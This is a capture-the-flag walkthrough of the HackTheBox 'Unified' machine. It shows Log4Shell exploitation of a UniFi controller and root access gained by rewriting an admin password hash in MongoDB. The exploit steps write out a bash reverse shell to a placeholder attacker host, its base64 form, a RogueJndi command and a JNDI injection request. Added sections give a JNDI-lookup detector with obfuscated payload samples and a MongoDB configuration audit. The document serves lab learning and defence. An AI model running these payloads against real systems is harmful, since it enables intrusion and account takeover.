HackTheBox: Unified Writeup


Overview

Unified is a Linux-based HackTheBox machine featuring a UniFi Network Controller application vulnerable to Log4j (CVE-2021-44228). This writeup details the exploitation process from initial access through Log4j RCE to privilege escalation via MongoDB manipulation.

Reconnaissance

Port Scanning

We start with a comprehensive port scan:

nmap -T4 -p- -A -Pn <HTB_IP>

Open Ports:

  • 22/tcp – OpenSSH 8.2p1 Ubuntu
  • 6789/tcp – IBM DB2 Admin (possibly UniFi related)
  • 8080/tcp – HTTP Proxy (redirects to /manage)
  • 8443/tcp – SSL/HTTPS – UniFi Network Controller
  • 8843/tcp – SSL/HTTPS (UniFi related)
  • 8880/tcp – HTTP service

The presence of UniFi Network Controller on port 8443 is the primary attack surface.

Web Application Analysis

Browsing to https://<HTB_IP>:8443 reveals the UniFi Network Controller login page. The application is running a version vulnerable to Log4j (CVE-2021-44228).

Initial Access

Log4j Exploitation (CVE-2021-44228)

The UniFi Network Controller is vulnerable to Log4Shell, a critical remote code execution vulnerability in Apache Log4j. We can exploit this through the login endpoint.

Setting Up the Exploit

  1. Prepare the reverse shell payload (base64 encoded):

     echo 'bash -c bash -i >& /dev/tcp/<Attacker_ip>/1234 0>&1' | base64

     This produces a base64-encoded payload like:

     YmFzaCAtYyBiYXNoIC1pID4mL2Rldi90Y3AvMTAuMTAuMTUuMTMyLzEyMzQgMD4mMQo=

  2. Set up a listener:

     nc -lvnp 1234

  3. Use RogueJndi to host the malicious LDAP server:

     java -jar RogueJndi-1.1.jar --command "bash -c {echo,YmFzaCAtYyBiYXNoIC1pID4mL2Rldi90Y3AvMTAuMTAuMTUuMTMyLzEyMzQgMD4mMQo=}|{base64,-d}|{bash,-i}" --hostname <Attacker_ip>

Exploiting via Burp Suite

Intercept the login request and inject the Log4j payload in a field that gets logged:

Request:

POST /api/login HTTP/1.1
Host: <HTB_IP>:8443
Content-Length: 70
Content-Type: application/json; charset=utf-8
Accept: */*
Origin: https://<HTB_IP>:8443
Referer: https://<HTB_IP>:8443/manage/account/login?redirect=%2Fmanage

{"username":"admin","password":"admin","remember":"${jndi:ldap://<Attacker_ip>/whatever}","strict":true}

The remember field contains the Log4j payload: ${jndi:ldap://<Attacker_ip>/whatever}

When the application logs this value, it triggers the JNDI lookup, which connects to our malicious LDAP server and executes the reverse shell payload.
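Detection, as an added example that is not part of the original writeup: the Python below normalises a request or log line (URL-decoding it and collapsing the ${lower:...}, ${upper:...} and ${...:-x} lookups commonly used to disguise the string) and then looks for a ${jndi:<scheme>: lookup, reporting the scheme. It generalises beyond the single plain-text payload shown above to the obfuscated forms seen in the wild. The sample lines, header names and the address 192.0.2.10 are constructed for the example.

```python
import re
import urllib.parse
from typing import List, Tuple

# Inner lookups that attackers nest inside ${jndi:...} to defeat a naive
# substring match. For detection we only need to collapse them to the text
# they would resolve to; this is not an evaluator of Log4j lookups.
_CASE_LOOKUP = re.compile(r"\$\{\s*(?:lower|upper)\s*:\s*([^${}]*?)\s*\}", re.IGNORECASE)
_DEFAULT_LOOKUP = re.compile(r"\$\{[^${}]*?:-([^${}]*?)\}")   # ${env:NOPE:-j}, ${::-j}
_JNDI = re.compile(r"\$\{\s*jndi\s*:\s*([a-z0-9+.-]+)\s*:", re.IGNORECASE)


def normalize(text: str, rounds: int = 10) -> str:
    """Undo the common encodings and nested lookups used to hide a JNDI string."""
    # Payloads arrive in query strings, headers and JSON bodies, sometimes
    # URL-encoded more than once; decode until the text stops changing.
    for _ in range(3):
        decoded = urllib.parse.unquote(text)
        if decoded == text:
            break
        text = decoded
    # Collapse nested lookups from the inside out until nothing changes.
    for _ in range(rounds):
        collapsed = _CASE_LOOKUP.sub(lambda m: m.group(1), text)
        collapsed = _DEFAULT_LOOKUP.sub(lambda m: m.group(1), collapsed)
        if collapsed == text:
            break
        text = collapsed
    return text


def find_jndi(text: str) -> List[str]:
    """Return the URI scheme of every ${jndi:...} lookup found after normalisation."""
    return [m.group(1).lower() for m in _JNDI.finditer(normalize(text))]


def scan_log(lines) -> List[Tuple[int, List[str]]]:
    """Return (1-based line number, schemes) for each line carrying a JNDI lookup."""
    hits = []
    for n, line in enumerate(lines, 1):
        schemes = find_jndi(line)
        if schemes:
            hits.append((n, schemes))
    return hits


# Constructed sample lines (not from the box); 192.0.2.10 is a documentation address.
SAMPLE_LINES = [
    'POST /api/login {"username":"admin","password":"admin","remember":"${jndi:ldap://192.0.2.10/whatever}","strict":true}',
    "GET /manage/account/login?redirect=%2Fmanage 200",
    "User-Agent: ${${lower:j}ndi:${lower:l}dap://192.0.2.10/a}",
    "X-Api-Version: %24%7Bjndi%3Armi%3A%2F%2F192.0.2.10%3A1099%2Fa%7D",
    "X-Forwarded-For: ${${::-j}${::-n}${::-d}${::-i}:${::-d}ns://192.0.2.10/a}",
    "startup: data dir ${HOME}/.unifi",
]

if __name__ == "__main__":
    for n, schemes in scan_log(SAMPLE_LINES):
        print(f"line {n}: JNDI lookup via {', '.join(schemes)}")
```

Run as-is it flags lines 1, 3, 4 and 5 and leaves the benign redirect and the ${HOME} reference alone; pointing scan_log at the web server's access log or the controller's application log gives the "detect JNDI lookup attempts" monitoring the mitigation section calls for.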

Reverse Shell

After the payload is executed, we receive a reverse shell connection on our listener. We now have initial access to the system.

Privilege Escalation

MongoDB Enumeration

After gaining initial access, we enumerate running services:

ps aux | grep mongo

MongoDB is running, likely on the default port 27117. The UniFi application uses MongoDB to store its configuration and user data.

MongoDB Credential Manipulation

We can connect to MongoDB and manipulate the admin user’s password hash:

  1. Connect to MongoDB:

     mongo --port 27117 ace

  2. Update the administrator password hash:

     db.admin.update( {"_id" : ObjectId("61ce278f46e0fb0012d47ee4")}, {$set:{"x_shadow" : "$6$U9M8qi9zCuJWzbZe$qphgvULzJWTXf248AysIPONmbASqUGUMw468rACD2UM/7.xbF4EQUE3UnA1pbP0k0kSphlaU3WTMMeAvAl8AM1"}} )

     This updates the administrator’s password hash. The hash corresponds to a known password (in this case, we generate a hash for “administrator”).

  3. Generate a new password hash (if needed):

     mkpasswd -m sha-512 administrator

     This generates a SHA-512 password hash for the password “administrator”.

SSH Access as Root

After updating the MongoDB password hash, we can SSH into the system as root:

ssh root@<HTB_IP>

When prompted, enter the password: administrator (or whatever password we set the hash for).

Alternative: Direct Root Access

If the MongoDB manipulation doesn’t work, we can also check for the usual privilege escalation vectors:

  • SUID binaries
  • Sudo misconfigurations
  • Writable files executed by root
  • Other common privilege escalation vectors

Root Flag

Once we have root access, we can retrieve the root flag:

cat /root/root.txt

Key Takeaways

  1. Log4j Vulnerability: The Log4Shell vulnerability (CVE-2021-44228) is a critical RCE vulnerability that affects many Java applications. Always keep Log4j updated to version 2.17.0 or later.
  2. JNDI Injection: JNDI lookups can be exploited to execute arbitrary code when user input is logged without proper sanitization.
  3. MongoDB Security: MongoDB instances should be properly secured with authentication and network restrictions. Default configurations often allow local access without authentication.
  4. Password Hash Manipulation: Modifying password hashes in databases can provide unauthorized access if the application doesn’t implement additional security controls.

Mitigation Recommendations

  • Update Log4j: Immediately update to Log4j 2.17.0 or later, or apply the appropriate patches for your version
  • Input Sanitization: Implement proper input validation and sanitization, especially for data that gets logged
  • MongoDB Security:
    • Enable authentication on MongoDB
    • Restrict network access to MongoDB (bind to localhost only if not needed externally)
    • Use strong passwords and implement proper access controls
  • Network Segmentation: Isolate database servers from web applications where possible
  • Monitoring: Implement logging and monitoring to detect JNDI lookup attempts and unauthorized database access
  • Least Privilege: Run services with minimal required privileges
  • Regular Updates: Keep all software components updated with the latest security patches
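The MongoDB items above, as an added example that is not part of the original writeup: a small audit that parses the two-level YAML subset used by mongod.conf and flags a wildcard bind address and, more importantly for this box, missing authorization. Both configuration fragments are constructed for the example (the weak one reproduces the condition the writeup exploits: a local mongod with no access control), and the parser handles only the sections the audit needs.

```python
from typing import Dict, List

# Constructed mongod.conf fragments, not taken from the box. The weak one
# mirrors the situation the writeup exploits: a mongod reachable with no
# authentication, so any local shell can rewrite the admin document.
WEAK_CONF = """\
# constructed example
net:
  port: 27117
  bindIp: 0.0.0.0
storage:
  dbPath: /var/lib/unifi/db
"""

HARDENED_CONF = """\
# constructed example
net:
  port: 27117
  bindIp: 127.0.0.1
security:
  authorization: enabled
storage:
  dbPath: /var/lib/unifi/db
"""


def parse_mongod_conf(text: str) -> Dict[str, Dict[str, str]]:
    """Parse the two-level 'section:\\n  key: value' YAML subset used by mongod.conf.

    Deliberately not a full YAML parser: it handles comments, blank lines and
    the net:/security:/storage: sections an audit needs, and nothing more.
    """
    conf: Dict[str, Dict[str, str]] = {}
    section = None
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].rstrip()   # drop comments (values containing '#' are not expected here)
        if not line.strip():
            continue
        indent = len(line) - len(line.lstrip())
        key, _, value = line.strip().partition(":")
        key, value = key.strip(), value.strip()
        if indent == 0:
            section = key
            conf.setdefault(section, {})
        elif section is not None:
            conf[section][key] = value
    return conf


def audit_mongod(conf: Dict[str, Dict[str, str]]) -> List[str]:
    """Return the findings a reviewer would raise against this configuration."""
    findings = []
    net = conf.get("net", {})
    security = conf.get("security", {})

    # mongod binds to localhost by default; an explicit wildcard exposes it to the network.
    bind_ips = [ip.strip() for ip in net.get("bindIp", "127.0.0.1").split(",")]
    if net.get("bindIpAll", "false").lower() == "true" or any(ip in ("0.0.0.0", "::") for ip in bind_ips):
        findings.append("net.bindIp exposes mongod to all interfaces")

    # The default is no access control at all: every local process is effectively a superuser.
    if security.get("authorization", "disabled").lower() != "enabled":
        findings.append("security.authorization is not enabled: any local user can rewrite credentials")
    return findings


if __name__ == "__main__":
    for name, text in (("weak", WEAK_CONF), ("hardened", HARDENED_CONF)):
        print(name, audit_mongod(parse_mongod_conf(text)) or ["no findings"])
```

The ordering of the two checks is deliberate: binding to 127.0.0.1 alone would not have stopped the chain in this writeup, because the Log4j reverse shell is already a local process, so security.authorization is the control that actually protects the x_shadow field.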

This writeup is for educational purposes only. Always ensure you have proper authorization before performing any security testing.
